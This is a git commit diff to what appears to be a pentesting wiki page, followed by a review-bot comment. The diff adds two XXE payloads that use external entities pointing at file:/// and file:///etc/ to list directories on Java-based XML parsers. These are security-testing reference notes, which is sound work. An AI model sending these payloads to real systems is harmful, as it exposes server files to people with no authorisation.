GitBook: [master] one page modified

CPol 2021-08-03 11:46:59 +00:00 committed by gitbook-bot
parent 76100d0b06
commit 77754cb2d9
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF


@ -119,6 +119,18 @@ In this third case notice we are declaring the `Element stockCheck` as ANY
![](../.gitbook/assets/image%20%2832%29.png)
### Directory listing
In **java** based applications it might be possible to **list the contents of a directory** via XXE with a payload like:
```markup
<!-- Root / -->
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE aa[<!ELEMENT bb ANY><!ENTITY xxe SYSTEM "file:///">]><root><foo>&xxe;</foo></root>
<!-- /etc/ -->
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root[<!ENTITY xxe SYSTEM "file:///etc/" >]><root><foo>&xxe;</foo></root>
```
### SSRF
An XXE could also bu used to abuse a SSRF inside a cloud
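Review bot: In the new "Directory listing" code block, each label comment (`<!-- Root / -->`, `<!-- /etc/ -->`) sits directly before a `<?xml version="1.0" encoding="UTF-8"?>` declaration, and an XML declaration is only permitted at the very start of a document, so a reader who copies a label together with its payload gets a document that a conforming parser rejects as malformed. Move the two labels out of the fence into the surrounding prose, or split the block into one fence per document, so each `<?xml ...?>` is the first thing in its fence. The two documents also differ without explanation: the first declares `<!DOCTYPE aa[<!ELEMENT bb ANY>...` while its root element is `root`, the second uses `<!DOCTYPE root[`; pick one form or say why both are shown. Wording: "java" should be "Java", and in the SSRF line "could also bu used" should read "be used". Since the section says this "might be possible" only in Java based applications, a sentence stating what makes the listing appear there would help readers assess whether a given parser is exposed.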